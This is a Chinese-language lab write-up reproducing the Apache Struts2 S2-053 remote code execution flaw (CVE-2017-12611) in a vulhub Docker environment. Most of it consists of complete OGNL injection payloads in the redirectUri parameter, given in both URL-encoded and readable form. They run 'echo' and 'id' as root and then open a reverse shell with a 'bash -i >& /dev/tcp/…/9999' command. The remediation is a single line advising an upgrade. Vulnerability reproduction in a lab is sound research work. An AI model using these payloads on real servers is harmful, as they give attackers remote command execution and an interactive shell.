CVE-2017-12611 S2-053 远程代码执行漏洞
漏洞 远程 2017 CVE 代码执行 S2 053
2023-06-13 09:15:43 时间
1 漏洞信息
漏洞名称 | 远程代码执行漏洞 |
---|---|
漏洞编号 | CVE-2017-12611 |
危害等级 | 高危 |
漏洞类型 | 中间件漏洞 |
漏洞厂商 | Apache |
漏洞组件 | Struts2 |
受影响版本 | 2.0.1 <= Struts2 <= 2.3.33,2.5 <= Struts2 = 2.5.10 |
漏洞概述 | Struts2在使用Freemarker模块引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但是由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 |
2 环境搭建
2.1 环境概述
- Linux操作系统
2.2 搭建过程
拉取镜像
cd vulhub/struts2/s2-053
docker-compose up -d
访问http://192.168.146.158:8053/hello.action
3 漏洞复现
根据vulhub官网的poc,查看是否存在该漏洞。发现成功执行了删除has vul的语句,说明存在该漏洞。
redirectUri=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27echo%20has%20vul%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D%0A
payload原型:
redirectUri=%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo has vul').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
访问漏洞url并且添加恶意payload进行抓包。
redirectUri=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D%0A
payload原型:
redirectUri=%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
发现成功执行了id命令,发现是root权限。
修改payload,执行反弹shell命令。
首先要监听端口,ip是攻击ip,不是漏洞靶机ip。这里没有再开另外一台机器,因此用和靶机同一台的ip进行接收所反弹的shell。
对要生成的反弹shell命令进行url编码
这里的ip地址也是攻击机的ip地址
bash -i >& /dev/tcp/192.168.146.158/9999 0>&1
bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.146.158%2F9999%200%3E%261
最终的反弹shell payload如下
redirectUri=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.146.158%2F9999%200%3E%261%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D%0A
payload原型:
redirectUri=%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='bash -i >& /dev/tcp/192.168.146.158/9999 0>&1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
反弹成功
4 修复建议
1、推荐的解决方案:升级至比受漏洞影响的更高版本。
相关文章
- Apache Solr远程代码执行(CVE-2019-0193)漏洞复现
- 网络安全:小心MSHTA漏洞为黑客开启远程控制之门
- Android 联手 Arm 击退内存漏洞
- Weblogic WLS组件IIOP协议远程代码执行漏洞 (CVE-2020-2551)
- 漏洞复现 - - - WebLogic反序列化远程命令执行漏洞(二)
- Spring Cloud Gateway远程代码执行漏洞风险
- CVE-2022-22947:Spring Cloud Gateway远程代码执行漏洞
- ICMS 8.0.0后台模板注入导致远程代码执行0day漏洞分析
- Apache log4j2 远程命令执行漏洞复现
- wannacry病毒作者_wannacry病毒利用了哪种漏洞
- 如何使用ApacheTomcatScanner扫描Apache Tomcat服务器漏洞
- S2-001 远程代码执行漏洞
- CVE-2017-9791 S2-048 远程代码执行漏洞
- CVE-2017-10271 Weblogic远程代码执行漏洞
- 实战|探究公众号接口漏洞:从后台登录口到旁站getshell
- FreeBuf周报 | 沃尔沃零售商泄露敏感文件;OpenAI推出漏洞赏金计划
- Linux Systemd被爆远程漏洞 CVE-2017
- 硬核观察 | 全球 60% 的电子邮件服务器受到已存在了 17 年的远程漏洞影响
- CVE-2018-1270:spring-messaging远程代码执行漏洞分析预警
- 漏洞预警:MySQL代码执行0-day漏洞 可本地提权
- PHP multipart/form-data 远程DOS漏洞
- Struts2 又现高危漏洞,黑客分分钟可远程执行任意系统命令【紧急预警】
- 黑客可以利用管理DNS服务供应商的漏洞来监视公司和组织的内部流量
- 跨站脚本执行漏洞详解与防护